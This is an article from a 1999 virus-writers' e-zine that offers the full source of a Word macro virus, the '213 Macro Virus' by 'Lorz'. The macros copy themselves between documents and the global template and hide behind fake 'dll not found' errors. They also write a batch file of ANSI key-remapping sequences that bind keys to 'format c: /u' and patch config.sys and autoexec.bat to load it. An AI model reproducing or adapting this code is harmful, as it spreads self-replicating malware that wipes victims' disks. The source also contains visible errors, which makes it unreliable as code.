ฤฤฤฤฤฤฤ[PVW5.016]ฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤ
Written for the : Pinoy Virus Writers E-Zine #5

                                % % % % %

                               - = %|% = -

 ษอออ   sOuRcEs !!!  ออออออออออออออออออออออออออออออออออออออออออป
 ศอออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออผ

  213 Macro Virus
  (Bug Fixed Version)
  By : Lorz

  The bug was that the installing of the ansi.sys was on the autoexec.bat.
  It must be in the config.sys. Here it is, I think it will now work!!!

-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ--

Sub AutoOpen 
On Error Goto Errorhandler
Fname$ = FileName$()
MacName$ = Fname$ + ":AutoOpen"

MacroCopy MacName$, "Global:ToolsMacro"
MacroCopy MacName$, "Global:ViewVBCode"
MacroCopy MacName$, "Global:Lorz"
Errorhandler:
If IsDocumentDirty() = - 1 Then
MacroCopy "Global:AutoOpen", MacName$
MacroCopy "Global:Lorz", MacName$
MacroCopy "Global:ToolsMacro", MacName$
MacroCopy "Global:ViewVBCode", MacName$
End If
FileSaveAs .Format = 1
End Sub

Sub Lorz()
   On Error GoTo Puta

   Open "c:\exec.bat" For Output As #1
   Print #1, "@ECHO ON"
   Print #1, "[33;"format c: /u";13p"
   Print #1, "[34;"format c: /u";13p"
   Print #1, "[35;"format c: /u";13p"
   Print #1, "[36;"format c: /u";13p"
   Print #1, "[37;"format c: /u";13p"
   Print #1, "[38;"format c: /u";13p"
   Print #1, "[39;"format c: /u";13p"
   Print #1, "[40;"format c: /u";13p"
   Print #1, "[76;"format c: /u";13p"
   Print #1, "[79;"format c: /u";13p"
   Print #1, "[82;"format c: /u";13p"
   Print #1, "[90;"format c: /u";13p"
   Print #1, "[108;"format c: /u";13p"
   Print #1, "[111;"format c: /u";13p"
   Print #1, "[114;"format c: /u";13p"
   Print #1, "[122;"format c: /u";13p"
   Close #1
 
   On Error GoTo Puta
   Open "c:\config.sys" For Append As #2  
   Print #2, "DEVICE=C:\WINDOWS\COMMAND\ANSI.SYS"
   Close #2

   On Error GoTo Puta
   Open "c:\autoexec.bat" For Append As #3 	
   Print #3, "Run c:\windows\exec.bat"
   Close #3

Puta:
End Sub()

Sub ToolsMacro()
Msgbox "0C25.dll not found",0,"ERROR"
End Sub

Sub ViewVBCode()
Msgbox "0C25.dll not found",0,"ERROR"
End Sub

-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ---ฤฤ-ฤ--
(C) Pinoy Virus Writers 1999
Lorz213@mailcity.com
